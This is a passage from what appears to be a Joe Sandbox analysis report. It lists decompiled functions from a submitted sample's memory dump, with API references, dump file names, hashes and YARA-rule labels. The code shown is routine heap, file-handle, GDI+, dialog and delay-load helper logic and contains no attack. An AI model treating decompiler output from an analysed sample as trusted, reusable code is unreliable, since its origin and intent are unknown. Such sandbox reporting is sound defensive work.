					_t6 = E000871AD(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00088518
0x0008851e
0x00088524
0x00088556
0x0008855b
0x00088561
0x00000000
0x00088561
0x00088528
0x0008852a
0x0008852a
0x00088541
0x0008854a
0x00088552
0x00000000
0x00000000
0x00088532
0x00088534
0x00000000
0x00000000
0x00088537
0x0008853c
0x0008853d
0x0008853f
0x00000000
0x00000000
0x0008853f
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0008C13D,00000000,?,000867E2,?,00000008,?,000889AD,?,?,?), ref: 0008854A

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f217501f6418f2b4234348e9fb7c5d0f02af78f23c42c8c34e2363b850beb094
Instruction ID: ee1d257e0322eeed4d358fa78415cbdad6054e40342500f6a90f75fc97004f45
Opcode Fuzzy Hash: f217501f6418f2b4234348e9fb7c5d0f02af78f23c42c8c34e2363b850beb094
Instruction Fuzzy Hash: CCE0E5715409215AEB7137695C00B9A7BCCBF413B0F94C210ECD8E2082CF60DC0047E9

Uniqueness

Uniqueness Score: -1.00%

Function 000696D0 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E000696D0(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1a)) != _t16) {
					E00066E3E(0xa0f50, _t21 + 0x24);
				}
				return _t16;
			}

0x000696d2
0x000696d4
0x000696da
0x000696e0
0x000696f1
0x000696f6
0x000696f8
0x000696f8
0x000696fa
0x000696fa
0x000696fe
0x00069704
0x00069714
0x00069714
0x0006971d

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0006968F,?,?,?,?,00091FA1,000000FF), ref: 000696EB

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 147f4c57024d55c9f17249561ec91696ffd175a78dbd87c34062419365498ade
Instruction ID: 38d934bc18b8d574ab584cf9c84a5494a65ee98527e0dcac93075d53de6ee70b
Opcode Fuzzy Hash: 147f4c57024d55c9f17249561ec91696ffd175a78dbd87c34062419365498ade
Instruction Fuzzy Hash: DEF0823055AB048FDB308A24D959792B7EAAB12735F088B1ED0F753DE0D775684D8F00

Uniqueness

Uniqueness Score: -1.00%

Function 0006A4C6 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0006A4C6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E0006B925(_a4) == 0) {
					_t12 = E0006A5F4(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E0006A1E2( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E0006A1FA( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}

0x0006a4c7
0x0006a4cf
0x0006a4dd
0x0006a4ea
0x0006a4f2
0x00000000
0x00000000
0x0006a4f5
0x0006a501
0x0006a513
0x0006a51e
0x00000000
0x0006a524
0x0006a4df
0x00000000

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0006A4F5

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 01634428db62e3e04705255be85c2da31b8ba25e954d2c40b0fe7e41a017446a
Instruction ID: 848223e049c629423858e21466f8fd20cda82031d5311893d2fd46fde0065e6c
Opcode Fuzzy Hash: 01634428db62e3e04705255be85c2da31b8ba25e954d2c40b0fe7e41a017446a
Instruction Fuzzy Hash: 82F0E931009780AACA327B7848047C6BBD27F07331F04CA49F1FD22196C27414D59F23

Uniqueness

Uniqueness Score: -1.00%

Function 0007067C Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0007067C() {
				void* __esi;
				void* _t2;

				L0007134B(); // executed
				_t2 = E00071350();
				if(_t2 != 0) {
					_t2 = E00066E8C(_t2, 0xa0f50, 0xff, 0xff);
				}
				if( *0xa0f5c != 0) {
					_t2 = E00066E8C(_t2, 0xa0f50, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x0007067e
0x00070683
0x00070694
0x00070699
0x00070699
0x000706a5
0x000706aa
0x000706aa
0x000706b1
0x000706b9

APIs

SetThreadExecutionState.KERNEL32 ref: 000706B1

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 856994c13e30d599fcfca57a434c27d792f6db8bd0feef03950e7cf26766c550
Instruction ID: 39ce61f916da06eac79a7839f50dab5225929ede810ca9ee51ce93059a4e9722
Opcode Fuzzy Hash: 856994c13e30d599fcfca57a434c27d792f6db8bd0feef03950e7cf26766c550
Instruction Fuzzy Hash: E9D05B35B1415069D6213378AC167FE1A474FC3710F09417AB40D675C78B5F0D8656E6

Uniqueness

Uniqueness Score: -1.00%

Function 00079D7B Relevance: 1.5, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00079D7B(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L0007E214();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00079B0F(__eax, _a4, _a8); // executed
				return _t6;
			}

0x00079d7e
0x00079d7f
0x00079d81
0x00079d86
0x00079d8b
0x00000000
0x00079d9c
0x00079d95
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00079D81

Part of subcall function 00079B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00079B30

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 0fab88ff6836c43dd681eb8ea57b4ac4f0269af26d65948d22309a037148edc6
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: 6FD0C730A5920D7ADF51BA75DC039BE7BA9DB04350F10C165BC0C86152FE75EE10A669

Uniqueness

Uniqueness Score: -1.00%

Function 00069989 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00069989(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0006998d
0x00069995
0x0006999e
0x000699ab
0x000699a5
0x000699a7
0x000699a7
0x0006998f
0x00069991
0x00069991

APIs

GetFileType.KERNELBASE(000000FF,00069887), ref: 00069995

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: d34f44e8927e3dac68e85d3ae356f0aab26c64ea6179169e141eb780a6bfa11f
Instruction ID: 50056ff7ff2e9c78168661624ce6534f526c1a3dd97ac6c95b983f23b42626c2
Opcode Fuzzy Hash: d34f44e8927e3dac68e85d3ae356f0aab26c64ea6179169e141eb780a6bfa11f
Instruction Fuzzy Hash: F6D01231011180958FA5463C4D090997797DB83366B3CC6ACD025C44A1D733C803F551

Uniqueness

Uniqueness Score: -1.00%

Function 0007D41A Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0007D41A(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xa8458, 0x6a, 0x402, E0006FAEC(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E0007AC74(); // executed
				return _t7;
			}

0x0007d43f
0x0007d445
0x0007d44a

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0007D43F

Part of subcall function 0007AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0007AC85
Part of subcall function 0007AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0007AC96
Part of subcall function 0007AC74: IsDialogMessageW.USER32(00070354,?), ref: 0007ACAA
Part of subcall function 0007AC74: TranslateMessage.USER32(?), ref: 0007ACB8
Part of subcall function 0007AC74: DispatchMessageW.USER32(?), ref: 0007ACC2

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 289a69e9da502ef4e15bea94d3aa8b8185973a2cbd37df8f37ecf10d633557f1
Instruction ID: 3a79e278a3dd08bd2dcf39b47f3408154b17bea5780e24a1cbe0cf42ad6421cc
Opcode Fuzzy Hash: 289a69e9da502ef4e15bea94d3aa8b8185973a2cbd37df8f37ecf10d633557f1
Instruction Fuzzy Hash: EAD09E71144300BBE6162B51DE06F1F7AA6AB99B04F004554B348740B286669D30AB16

Uniqueness

Uniqueness Score: -1.00%

Function 0007D891 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D891() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2168); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0d4932caa1fc87f778c3c5d72cfa6ef2e47b2ea29439692854e3ed54b917fa55
Instruction ID: 61500bd4015cf2ce81b65ec90811b5654ef02d164e352b6c54d2c4140cbae553
Opcode Fuzzy Hash: 0d4932caa1fc87f778c3c5d72cfa6ef2e47b2ea29439692854e3ed54b917fa55
Instruction Fuzzy Hash: B0B01295A6D3017C35482200BD62D3F063CCFC0B20330C53FF54EE40C1E8486C489436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D8AC Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D8AC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2160); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ad6cd5a26d1820a97103abd5a4bb89735587c95f56be9bf95e2122a2ddec4bd
Instruction ID: 48f754619dc3201ac68cf14727892a111b703632d3e4dc61db775be2ae2d55ec
Opcode Fuzzy Hash: 0ad6cd5a26d1820a97103abd5a4bb89735587c95f56be9bf95e2122a2ddec4bd
Instruction Fuzzy Hash: 98B012D5A6D1016C31486204BD52E3F062CDFC0B20330C02FF54ED41C1EC486C045536

Uniqueness

Uniqueness Score: -1.00%

Function 0007D8B6 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D8B6() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc215c); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 09b9e8955fa8a2293f7eef64c77dfc4ed276dc90ddb6db1bcc5d9623fc923aa3
Instruction ID: dca18708a6cef05e781be4ccce3efaf96138b732cab567797f8a1d759ae98333
Opcode Fuzzy Hash: 09b9e8955fa8a2293f7eef64c77dfc4ed276dc90ddb6db1bcc5d9623fc923aa3
Instruction Fuzzy Hash: E4B01291A6D1016C31486204BD12E3E062CCFC1B20330C03FF94ED42C1E8486C095436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D8C0 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D8C0() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2158); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 212b5dd9adc33c495fe7245b08c10c0c3abf4660c781a7b923692074d8ffb6f5
Instruction ID: 41674542532c3f607abb0bdd2e471c3983808363ac43a405adb5c8d34de08a06
Opcode Fuzzy Hash: 212b5dd9adc33c495fe7245b08c10c0c3abf4660c781a7b923692074d8ffb6f5
Instruction Fuzzy Hash: B1B01291A6D1016C31886204BD12E3E062CCFC0B20330C13FF54ED42C1E8486C895436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D8CA Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D8CA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2154); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6006fa2434c5b767348b7832d3124ec5fc97e22e7a82c32020fcd87fd719f310
Instruction ID: 661fadeaeab3972593c0136909ef1fd51126fb77cc70709ee2ab8a70de5c30f2
Opcode Fuzzy Hash: 6006fa2434c5b767348b7832d3124ec5fc97e22e7a82c32020fcd87fd719f310
Instruction Fuzzy Hash: 50B01291A6D0016C314C6205BE12E3E062CCFC0B20330C03FF54ED42C1E8886C0E6436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D8DE Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D8DE() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc214c); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 30106991d7821bf4d40cffcd843660eb1d62ab6e229f75d4e14264ed3b376609
Instruction ID: 5e302fd10f1c4c4310ae928739be52609055be594fe24c4cf66ae8fe7da8e66d
Opcode Fuzzy Hash: 30106991d7821bf4d40cffcd843660eb1d62ab6e229f75d4e14264ed3b376609
Instruction Fuzzy Hash: 78B012A2A6D1016C31487204BD12E3E062CCFC1B20330C02FF94ED41C1E8486C045436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D8E8 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D8E8() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2148); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
